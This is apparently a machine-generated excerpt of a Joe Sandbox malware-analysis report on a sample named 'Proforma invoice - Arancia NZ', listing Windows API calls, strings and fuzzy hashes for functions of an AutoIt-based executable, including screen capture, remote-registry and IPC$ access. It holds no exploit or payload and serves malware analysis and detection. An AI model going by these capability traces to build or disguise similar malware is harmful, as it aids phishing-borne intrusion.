                                                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 002C7408
                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 002C7444
                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 002C7468
                                                                                                                    • SelectObject.GDI32(00000006,?), ref: 002C7470
                                                                                                                    • DeleteObject.GDI32(?), ref: 002C7479
                                                                                                                    • DeleteDC.GDI32(00000006), ref: 002C7480
                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 002C748B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                    • Opcode ID: 44eaa1944362b99557f8afd5944dfbc32f2726bdfea76afe1132955e41a2ee1c
                                                                                                                    • Instruction ID: fcfb4fe30a7f447fc2b2304ba47adbf9e3a4b02a0baac77cf52701ce79df014f
                                                                                                                    • Opcode Fuzzy Hash: 44eaa1944362b99557f8afd5944dfbc32f2726bdfea76afe1132955e41a2ee1c
                                                                                                                    • Instruction Fuzzy Hash: 27513771914209EFCB14CFA8DC89EAEBBB9EF48310F14852EF95A97210D771AD508F50
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00270957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00256B0C,?,00008000), ref: 00270973
                                                                                                                      • Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00256BAD
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00256CFA
                                                                                                                      • Part of subcall function 0025586D: _wcscpy.LIBCMT ref: 002558A5
                                                                                                                      • Part of subcall function 0027363D: _iswctype.LIBCMT ref: 00273645
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                    • API String ID: 537147316-1018226102
                                                                                                                    • Opcode ID: edda6ef4cb17ec19d07f5802dd54043732c0e3ffed46a65fb275614c8528214e
                                                                                                                    • Instruction ID: 306090f915e51927d7fb456ac432286eb6d8bd2a9f1b90f841b22305f38597d5
                                                                                                                    • Opcode Fuzzy Hash: edda6ef4cb17ec19d07f5802dd54043732c0e3ffed46a65fb275614c8528214e
                                                                                                                    • Instruction Fuzzy Hash: AB02BD301293419FCB24EF20C8919AFBBE5EF99315F50481DF88A972A1DB30D969CF56
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002B2D50
                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 002B2DDD
                                                                                                                    • GetMenuItemCount.USER32(00315890), ref: 002B2E66
                                                                                                                    • DeleteMenu.USER32(00315890,00000005,00000000,000000F5,?,?), ref: 002B2EF6
                                                                                                                    • DeleteMenu.USER32(00315890,00000004,00000000), ref: 002B2EFE
                                                                                                                    • DeleteMenu.USER32(00315890,00000006,00000000), ref: 002B2F06
                                                                                                                    • DeleteMenu.USER32(00315890,00000003,00000000), ref: 002B2F0E
                                                                                                                    • GetMenuItemCount.USER32(00315890), ref: 002B2F16
                                                                                                                    • SetMenuItemInfoW.USER32(00315890,00000004,00000000,00000030), ref: 002B2F4C
                                                                                                                    • GetCursorPos.USER32(?), ref: 002B2F56
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 002B2F5F
                                                                                                                    • TrackPopupMenuEx.USER32(00315890,00000000,?,00000000,00000000,00000000), ref: 002B2F72
                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002B2F7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3993528054-0
                                                                                                                    • Opcode ID: f85e29ee21ff1adca874e51fcd7bce73ba3890500e461ee36ba2f7ca8a300caa
                                                                                                                    • Instruction ID: d0546146f3861d0da01287365e75e957585e233aa5847e64eb337648785f1a56
                                                                                                                    • Opcode Fuzzy Hash: f85e29ee21ff1adca874e51fcd7bce73ba3890500e461ee36ba2f7ca8a300caa
                                                                                                                    • Instruction Fuzzy Hash: 2E71F470611306FAEB218F15DC49FEABF64FB04394F144216F615AA1E1C7B1AC78CB94
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 002C88D7
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002C8904
                                                                                                                    • CoUninitialize.OLE32 ref: 002C890E
                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 002C8A0E
                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 002C8B3B
                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,002E2C0C), ref: 002C8B6F
                                                                                                                    • CoGetObject.OLE32(?,00000000,002E2C0C,?), ref: 002C8B92
                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 002C8BA5
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002C8C25
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 002C8C35
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID: ,,.
• API String ID: 2395222682-737214711
• Opcode ID: db4d32a2af06c5a39fc6c4e53765bf0a7dfa118c7b2e92b140c0bd95efa1fc0d
• Instruction ID: 41251250b6d8d5a7e9f6330f7788404126957ad4066d822dd7aa0f7bb1e154d2
• Opcode Fuzzy Hash: db4d32a2af06c5a39fc6c4e53765bf0a7dfa118c7b2e92b140c0bd95efa1fc0d
• Instruction Fuzzy Hash: 83C134B1628305AFD700DF24C884E2AB7E9BF89348F004A5DF98ADB250DB71ED15CB52
APIs
  • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
• _memset.LIBCMT ref: 002A786B
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002A78A0
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002A78BC
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002A78D8
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002A7902
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 002A792A
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002A7935
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002A793A
Strings
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1411258926-22481851
• Opcode ID: d29b0d5910c3946c8bf6814ff91b988e5a12a1d08daf9aa6968e3a464df56a34
• Instruction ID: 6855ab2d0cb810a9aac2b689180a88c27dfbed2df64badeb93bc69c5671fce90
• Opcode Fuzzy Hash: d29b0d5910c3946c8bf6814ff91b988e5a12a1d08daf9aa6968e3a464df56a34
• Instruction Fuzzy Hash: 28410872C25229ABCB11EFA4EC95DEEB778BF04751F00406AE905A31A1DB345E19CF94
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CFDAD,?,?), ref: 002D0E31
Strings
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Opcode ID: 9cb46927843f1164f019fb884d4cfe324427bb7ac2a31f6141d85792e6e9c963
• Instruction ID: 54135021ceeabc186ce5227eb38d2f847f5d0fa754caae59f100c7a0f8cf14e5
• Opcode Fuzzy Hash: 9cb46927843f1164f019fb884d4cfe324427bb7ac2a31f6141d85792e6e9c963
• Instruction Fuzzy Hash: 7C417B7552024A8FCF11EF10E8A6BEF3764AF15700F644416FC951B6A2DB709D2ACBA0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0028E2A0,00000010,?,Bad directive syntax error,002DF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 002AF7C2
• LoadStringW.USER32(00000000,?,0028E2A0,00000010), ref: 002AF7C9
  • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
• _wprintf.LIBCMT ref: 002AF7FC
• __swprintf.LIBCMT ref: 002AF81E
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002AF88D
Strings
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1506413516-4153970271
• Opcode ID: 8f73bc44b78a612b33f7283f88493932208e9e2d0bd9fdac18330f0691737ff1
• Instruction ID: d0b2db9f4904390af95bf754fd5410ca209a2c27da1e9acb37e3c768ada7fa7a
• Opcode Fuzzy Hash: 8f73bc44b78a612b33f7283f88493932208e9e2d0bd9fdac18330f0691737ff1
• Instruction Fuzzy Hash: FC21913186121EEFCF12EF90DC1AEED7738BF18301F044466F915660A2DA759A28DF54
APIs
  • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
  • Part of subcall function 00257924: _memmove.LIBCMT ref: 002579AD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002B5330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002B5346
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002B5357
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002B5369
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002B537A
Strings
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: aa0b360d9e0a062ad644d8dfb64d44b6a44010b878734cb767fec0ca6c36b064
• Instruction ID: 206c80dc189458ff7afd1c05a25627b97915631d34a2214a7a1c9f54031ffa71
• Opcode Fuzzy Hash: aa0b360d9e0a062ad644d8dfb64d44b6a44010b878734cb767fec0ca6c36b064
• Instruction Fuzzy Hash: 6A11B6309A112D79D720BB61DC59DFF7BBCEB91B81F000459B841A60D1DEB00D18C9B4
APIs
Strings
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 208665112-3771769585
• Opcode ID: 99008d472f99706b865af2f20ea7e85afff56f0b5b7d6082191359fb63f17d4a
• Instruction ID: b83db3b2a5d62ad2e38940b4edcf029ee92d2824126a48d37ad693de5eb50371
• Opcode Fuzzy Hash: 99008d472f99706b865af2f20ea7e85afff56f0b5b7d6082191359fb63f17d4a
• Instruction Fuzzy Hash: EE113D31920115AFDB20BB30AC8AEEAB7BCEF02311F0441B6F54AD6092FF709D95DA55
APIs
• timeGetTime.WINMM ref: 002B4F7A
  • Part of subcall function 0027049F: timeGetTime.WINMM(?,75A8B400,00260E7B), ref: 002704A3
• Sleep.KERNEL32(0000000A), ref: 002B4FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 002B4FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002B4FEC
• SetActiveWindow.USER32 ref: 002B500B
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002B5019
• SendMessageW.USER32(00000010,00000000,00000000), ref: 002B5038
• Sleep.KERNEL32(000000FA), ref: 002B5043
• IsWindow.USER32 ref: 002B504F
• EndDialog.USER32(00000000), ref: 002B5060
Strings
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: e9e1169e67105fd25b5574cec776e12891f0c2b8c13c813cf827e926d66c3e02
• Instruction ID: 1aea502a5ae7a9a047cc48fb3298f14c23a26be2f8ce2a1a5d23a5c2713e1eb4
• Opcode Fuzzy Hash: e9e1169e67105fd25b5574cec776e12891f0c2b8c13c813cf827e926d66c3e02
• Instruction Fuzzy Hash: A821F970616601BFE7116F60FDCDBF63BAEEB4E385F045425F106821B1CB718D208A65
APIs
  • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
  • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
• CoInitialize.OLE32(00000000), ref: 002BD5EA
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002BD67D
• SHGetDesktopFolder.SHELL32(?), ref: 002BD691
• CoCreateInstance.OLE32(002E2D7C,00000000,00000001,00308C1C,?), ref: 002BD6DD
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002BD74C
• CoTaskMemFree.OLE32(?,?), ref: 002BD7A4
• _memset.LIBCMT ref: 002BD7E1
• SHBrowseForFolderW.SHELL32(?), ref: 002BD81D
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002BD840
• CoTaskMemFree.OLE32(00000000), ref: 002BD847
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002BD87E
• CoUninitialize.OLE32(00000001,00000000), ref: 002BD880
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1246142700-0
                                                                                                                    • Opcode ID: 71ecb0b0a39df791a08894249a63e664e8330274c2cf1d0deeb78f183b81e476
                                                                                                                    • Instruction ID: 432f3ced38915bbd3e9d9680d91c8f3e53f5ee586b51e65f7b06306e9eb1a521
                                                                                                                    • Opcode Fuzzy Hash: 71ecb0b0a39df791a08894249a63e664e8330274c2cf1d0deeb78f183b81e476
                                                                                                                    • Instruction Fuzzy Hash: 4AB10975A10109EFDB04DFA4D888DEEBBB9EF48304B148469E90AEB261DB30ED55CF54
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 002AC283
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 002AC295
                                                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 002AC2F3
                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 002AC2FE
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 002AC310
                                                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 002AC364
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 002AC372
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 002AC383
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 002AC3C6
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 002AC3D4
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002AC3F1
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 002AC3FE
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3096461208-0
                                                                                                                    • Opcode ID: f899a1b9cd995a0f180a9a1eab12f9bad8dc4befda5d358e302ed5c71d4b608c
                                                                                                                    • Instruction ID: 15981a9deb1a9106a347a3cbdede4163458475c836db2ebf7e577147739ea253
                                                                                                                    • Opcode Fuzzy Hash: f899a1b9cd995a0f180a9a1eab12f9bad8dc4befda5d358e302ed5c71d4b608c
                                                                                                                    • Instruction Fuzzy Hash: EA514271F10205AFDF18CFA9DD89AAEBBB9EB88310F14812DF516D7290DB709D008B54
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00251B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00252036,?,00000000,?,?,?,?,002516CB,00000000,?), ref: 00251B9A
                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002520D3
                                                                                                                    • KillTimer.USER32(-00000001,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0025216E
                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0028BCA6
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0028BCD7
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0028BCEE
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0028BD0A
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0028BD1C
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 641708696-0
                                                                                                                    • Opcode ID: 1665191978061a63a85396f777b7d12c7924faf20acbc0210b60f6d7671f7323
                                                                                                                    • Instruction ID: 352841b699890e6dd276e509f894ad709eb1aa44ad62d3f93d53f3901403c11e
                                                                                                                    • Opcode Fuzzy Hash: 1665191978061a63a85396f777b7d12c7924faf20acbc0210b60f6d7671f7323
                                                                                                                    • Instruction Fuzzy Hash: E5618E35622A01DFDB36AF14D948B66B7F1FB95312F10842DE842579E1C770ACA9CF48
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002525DB: GetWindowLongW.USER32(?,000000EB), ref: 002525EC
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 002521D3
                                                                                                                    Similarity
                                                                                                                    • API ID: ColorLongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 259745315-0
                                                                                                                    • Opcode ID: 6d4a7a1dd4312439676a31fbbd14f8cd2c206f9f5a61820fc234bf89e4aca6e7
                                                                                                                    • Instruction ID: fbc6b02ca847a2452753e3a26a4a8bb7ab54a98d74dd6ef47957461a39b418d2
                                                                                                                    • Opcode Fuzzy Hash: 6d4a7a1dd4312439676a31fbbd14f8cd2c206f9f5a61820fc234bf89e4aca6e7
                                                                                                                    • Instruction Fuzzy Hash: 0D41F839511101DFDB215F28EC88BB93B65EB07332F544266FD65CA1E1C7318C5ADB19
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,002DF910), ref: 002BA90B
                                                                                                                    • GetDriveTypeW.KERNEL32(00000061,003089A0,00000061), ref: 002BA9D5
                                                                                                                    • _wcscpy.LIBCMT ref: 002BA9FF
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                    • API String ID: 2820617543-1000479233
                                                                                                                    • Opcode ID: 6b3c73827fe79cf6e7f76d1309c17c2daabf6e1b6fd0fbbc457c3a13cc3678b1
                                                                                                                    • Instruction ID: 093e01af3e07d5b05b26766bff36371412ea802d571ac4ff860fdf2c1b449ebe
                                                                                                                    • Opcode Fuzzy Hash: 6b3c73827fe79cf6e7f76d1309c17c2daabf6e1b6fd0fbbc457c3a13cc3678b1
                                                                                                                    • Instruction Fuzzy Hash: B051AC315383019BC300EF14C892AAFB7A5FF84780F54482DF996572A2DB719D29CE93
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: __i64tow__itow__swprintf
                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                    • API String ID: 421087845-2263619337
                                                                                                                    • Opcode ID: 7ec5b03edd0edbd03710ec2be732ff8baa3fe3292a7f2c877e5ee93efdbdbb9c
                                                                                                                    • Instruction ID: fa9afd78785369da5628b19428cfd5c459d7e019a62d05a1260c6e76ba9ac18f
                                                                                                                    • Opcode Fuzzy Hash: 7ec5b03edd0edbd03710ec2be732ff8baa3fe3292a7f2c877e5ee93efdbdbb9c
                                                                                                                    • Instruction Fuzzy Hash: 31412871531206EFDB24EF34D946E7A73E8FF05300F2444BEE949D7281EA75A9658B10
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002D716A
                                                                                                                    • CreateMenu.USER32 ref: 002D7185
                                                                                                                    • SetMenu.USER32(?,00000000), ref: 002D7194
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D7221
                                                                                                                    • IsMenu.USER32(?), ref: 002D7237
                                                                                                                    • CreatePopupMenu.USER32 ref: 002D7241
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D726E
                                                                                                                    • DrawMenuBar.USER32 ref: 002D7276
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                    • String ID: 0$F
                                                                                                                    • API String ID: 176399719-3044882817
                                                                                                                    • Opcode ID: 07af6eb103450e1e86ca4ec39b182bd9c8f0390114f1fd71c76d4d25d346702a
                                                                                                                    • Instruction ID: 15358dc03787ce5b4745dab97e8aeefdc6b167a86233b3895cd3efbf2e682304
                                                                                                                    • Opcode Fuzzy Hash: 07af6eb103450e1e86ca4ec39b182bd9c8f0390114f1fd71c76d4d25d346702a
                                                                                                                    • Instruction Fuzzy Hash: 1E414774A11205EFDB20DF64E988E9A7BB5FF49310F14402AFD0697360E735AD20CB90
                                                                                                                    APIs
                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002D755E
                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 002D7565
                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002D7578
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002D7580
                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 002D758B
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 002D7594
                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 002D759E
                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002D75B2
                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002D75BE
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                    • Opcode ID: 3a536a8d64e98bfa4419d465d373fad99cac806f999d2d65dcaa0bf095e2143e
                                                                                                                    • Instruction ID: 01c75a29b9b19090d2a78609e649714c5a9329cf97b569b14cf7d20a62ff86cd
                                                                                                                    • Opcode Fuzzy Hash: 3a536a8d64e98bfa4419d465d373fad99cac806f999d2d65dcaa0bf095e2143e
                                                                                                                    • Instruction Fuzzy Hash: 0D318D72515215BBDF129F64EC08FDA3B69FF09321F114226FA16A22A0D735DC21DBA8
APIs
• _memset.LIBCMT ref: 00276E3E
  • Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28
• __gmtime64_s.LIBCMT ref: 00276ED7
• __gmtime64_s.LIBCMT ref: 00276F0D
• __gmtime64_s.LIBCMT ref: 00276F2A
• __allrem.LIBCMT ref: 00276F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00276F9C
• __allrem.LIBCMT ref: 00276FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00276FD1
• __allrem.LIBCMT ref: 00276FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00277006
• __invoke_watson.LIBCMT ref: 00277077
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction ID: 4a99907ff3a3dc5454d7736ff5cf0a9f7dd36d14e3ee2999a387ce59156bdb3c
• Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction Fuzzy Hash: D3710676A21B17ABD714EE78DC45B6BB3A8AF04724F14C229F518E76C1E770DD208B90
APIs
• _memset.LIBCMT ref: 002B2542
• GetMenuItemInfoW.USER32(00315890,000000FF,00000000,00000030), ref: 002B25A3
• SetMenuItemInfoW.USER32(00315890,00000004,00000000,00000030), ref: 002B25D9
• Sleep.KERNEL32(000001F4), ref: 002B25EB
• GetMenuItemCount.USER32(?), ref: 002B262F
• GetMenuItemID.USER32(?,00000000), ref: 002B264B
• GetMenuItemID.USER32(?,-00000001), ref: 002B2675
• GetMenuItemID.USER32(?,?), ref: 002B26BA
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002B2700
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2714
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2735
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: 6f2d2f2e3ca43d4f942c201594341914b206ffc5c74a8258f8cdff4b0ccc3d92
• Instruction ID: c6dd401a2c7bc5dc61a1e4a49c21e8cab8e300d8279005eba4dde769f0b84d88
• Opcode Fuzzy Hash: 6f2d2f2e3ca43d4f942c201594341914b206ffc5c74a8258f8cdff4b0ccc3d92
